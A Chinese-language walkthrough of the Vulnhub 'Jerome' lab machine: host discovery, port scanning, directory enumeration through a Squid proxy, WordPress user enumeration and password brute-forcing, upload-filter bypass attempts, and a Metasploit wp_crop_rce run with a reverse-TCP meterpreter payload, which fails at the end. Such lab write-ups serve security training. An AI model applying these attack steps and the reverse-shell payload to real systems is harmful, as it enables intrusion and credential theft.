Jerome
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ sudo netdiscover -i eth1
Currently scanning: 172.16.95.0/16 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:0b:79:0e 2 120 PCS Systemtechnik GmbH
192.168.56.152 08:00:27:3e:42:78 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.152
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.152 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-05 09:06 EDT
Nmap scan report for bogon (192.168.56.152)
Host is up (0.00015s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
8080/tcp open http-proxy Squid http proxy 3.5.27
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.5.27
MAC Address: 08:00:27:3E:42:78 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.89 seconds
目标主机只有一个开放端口8080,应该是一个代理(squid)
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ searchsploit squid
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
MySQL Squid Access Report 2.1.4 - HTML Injection | php/webapps/20055.txt
MySQL Squid Access Report 2.1.4 - SQL Injection / Cross-Site Scripting | php/webapps/44483.txt
National Science Foundation Squid Proxy 2.3 - Internet Access Control Bypass | linux/remote/24105.txt
National Science Foundation Squid Web Proxy 1.0/1.1/2.1 - Authentication Failure | linux/remote/19567.txt
PageSquid CMS 0.3 Beta - 'index.php' SQL Injection | php/webapps/5899.txt
Squid - 'httpMakeVaryMark()' Remote Denial of Service | linux/dos/38365.txt
Squid - NTLM (Authenticated) Overflow (Metasploit) | linux/remote/16847.rb
Squid 2.0-4 - Cache FTP Proxy URL Buffer Overflow | unix/remote/21297.c
Squid 2.4.1 - Remote Buffer Overflow | linux/remote/347.c
Squid 2.5.x/3.x - NTLM Buffer Overflow (Metasploit) | multiple/remote/9951.rb
Squid 3.3.5 - Denial of Service (PoC) | linux/dos/26886.pl
Squid < 3.1 5 - HTTP Version Number Parsing Denial of Service | multiple/dos/8021.pl
Squid Analysis Report Generator 2.3.10 - Remote Code Execution | php/webapps/42993.txt
Squid Proxy 2.4/2.5 - NULL URL Character Unauthorized Access | linux/remote/23777.txt
Squid Proxy 2.5/2.6 - FTP URI Remote Denial of Service | linux/dos/29473.txt
Squid Web Proxy 2.2 - 'cachemgr.cgi' Unauthorized Connection | cgi/remote/20465.sh
Squid Web Proxy 2.3 - Reverse Proxy | linux/remote/21017.txt
SquidGuard 1.4 - Long URL Handling Remote Denial of Service | xml/dos/37685.txt
SquidGuard 1.x - NULL URL Character Unauthorized Access | linux/remote/23848.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
没有可利用的漏洞。
因为目标主机是代理,因此扫描目录时需要指定该端口为代理
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ gobuster dir --proxy http://192.168.56.152:8080 -u http://127.0.0.1/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://127.0.0.1/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] Proxy: http://192.168.56.152:8080
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/05 09:11:28 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 200) [Size: 7550]
Progress: 219853 / 220561 (99.68%)===============================================================
2022/11/05 09:12:21 Finished
===============================================================
发现了/server-status目录。
在Kali Linux设置代理(http://192.168.56.152:8080),访问该目录:
有个1337端口,对这个端口进行目录枚举
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ gobuster dir --proxy http://192.168.56.152:8080 -u http://127.0.0.1:1337/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://127.0.0.1:1337/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] Proxy: http://192.168.56.152:8080
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/05 09:17:30 Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 317] [--> http://127.0.0.1:1337/wordpress/]
/server-status (Status: 200) [Size: 7640]
Progress: 219337 / 220561 (99.45%)===============================================================
2022/11/05 09:18:22 Finished
===============================================================
发现运行wordpress站点,那么接下来用wpscan扫描一下用户名和插件。
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ wpscan --proxy http://192.168.56.152:8080 --url http://127.0.0.1:1337/wordpress/ -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://127.0.0.1:1337/wordpress/ [127.0.0.1]
[+] Started: Sat Nov 5 09:20:47 2022
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.29 (Ubuntu)
| - X-Cache-Lookup: MISS from jerome:8080
| - Via: 1.1 jerome (squid/3.5.27)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://127.0.0.1:1337/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://127.0.0.1:1337/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://127.0.0.1:1337/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://127.0.0.1:1337/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
| Found By: Emoji Settings (Passive Detection)
| - http://127.0.0.1:1337/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0'
| Confirmed By: Meta Generator (Passive Detection)
| - http://127.0.0.1:1337/wordpress/, Match: 'WordPress 5.0'
[i] The main theme could not be detected.
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==============================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] jerome
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] root
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Nov 5 09:20:50 2022
[+] Requests Done: 51
[+] Cached Requests: 4
[+] Data Sent: 16.109 KB
[+] Data Received: 143.36 KB
[+] Memory used: 199.699 MB
[+] Elapsed time: 00:00:02
发现出来了用户名: jerome root
接下来继续用wpscan 枚举密码:
┌──(kali㉿kali)-[~/Vulnhub/Jerome]
└─$ wpscan --proxy http://192.168.56.152:8080 --url http://127.0.0.1:1337/wordpress/ -e u -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] Performing password attack on Wp Login against 2 user/s
[SUCCESS] - jerome / jerome
^Cying root / eric22 Time: 00:03:46 < > (28790 / 28689202) 0.10% ETA: 62:44:22
[!] Valid Combinations Found:
| Username: jerome, Password: jerome
[!] No WPScan API Token given, as a result vulnerability data has not been output. > (28795 / 28689202) 0.10% ETA: 62:44:25
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Nov 5 09:27:02 2022
[+] Requests Done: 28815
[+] Cached Requests: 41
[+] Data Sent: 16.366 MB
[+] Data Received: 120.038 MB
[+] Memory used: 154.848 MB
[+] Elapsed time: 00:03:49
Scan Aborted: Canceled by User
破解出来用户名和密码: jerome jerome
登录wordpress后台: http://localhost:1337/wordpress/wp-login.php
接下来设法将shell.php上传到wordpress后台
提示:shell.php Sorry, this file type is not permitted for security reasons.
.php3, .php5都不行
.php%00jpg也不行
参考了其他人的做法,利用metasploit提供最新的漏洞利用
msf6 exploit(multi/http/wp_crop_rce) > set PASSWORD jerome
PASSWORD => jerome
msf6 exploit(multi/http/wp_crop_rce) > set USERNAME jerome
USERNAME => jerome
msf6 exploit(multi/http/wp_crop_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_crop_rce) > set RPORT 1337
RPORT => 1337
msf6 exploit(multi/http/wp_crop_rce) > set Proxies http://192.168.56.152:8080
Proxies => http://192.168.56.152:8080
msf6 exploit(multi/http/wp_crop_rce) > set LHOST 192.168.56.137
LHOST => 192.168.56.137
msf6 exploit(multi/http/wp_crop_rce) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/http/wp_crop_rce) > show options
Module options (exploit/multi/http/wp_crop_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD jerome yes The WordPress password to authenticate with
Proxies http://192.168.56.152:8080 no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 127.0.0.1 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 1337 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
USERNAME jerome yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.137 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress
msf6 exploit(multi/http/wp_crop_rce) > set TARGETURI /wordpress
TARGETURI => /wordpress
msf6 exploit(multi/http/wp_crop_rce) > show options
Module options (exploit/multi/http/wp_crop_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD jerome yes The WordPress password to authenticate with
Proxies http://192.168.56.152:8080 no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 127.0.0.1 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 1337 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /wordpress yes The base path to the wordpress application
USERNAME jerome yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.137 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress
msf6 exploit(multi/http/wp_crop_rce) > set ReverseAllowProxy true
ReverseAllowProxy => true
msf6 exploit(multi/http/wp_crop_rce) > show options
Module options (exploit/multi/http/wp_crop_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD jerome yes The WordPress password to authenticate with
Proxies http://192.168.56.152:8080 no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 127.0.0.1 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 1337 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /wordpress yes The base path to the wordpress application
USERNAME jerome yes The WordPress username to authenticate with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.137 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress
msf6 exploit(multi/http/wp_crop_rce) > exploit
[*] Started reverse TCP handler on 192.168.56.137:5555
[-] Exploit failed: SocketError getaddrinfo: Name or service not known
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/wp_crop_rce) > exploit
[*] Started reverse TCP handler on 192.168.56.137:5555
[-] Exploit failed: SocketError getaddrinfo: Name or service not known
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/wp_crop_rce) > set RHOSTS localhost
RHOSTS => localhost
msf6 exploit(multi/http/wp_crop_rce) > exploit
[*] Exploiting target 0.0.0.1
[*] Started reverse TCP handler on 192.168.56.137:5555
[-] Exploit failed: SocketError getaddrinfo: Name or service not known
[*] Exploiting target 127.0.0.1
[*] Started reverse TCP handler on 192.168.56.137:5555
[-] Exploit failed: SocketError getaddrinfo: Name or service not known
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/wp_crop_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_crop_rce) > show options
执行失败,好像是因为模块在建立socket的时候出错。
标签:http,0.1,192.168,exploit,wordpress,Vulnhub,wp,靶机,Jerome From: https://www.cnblogs.com/jason-huawen/p/16861719.html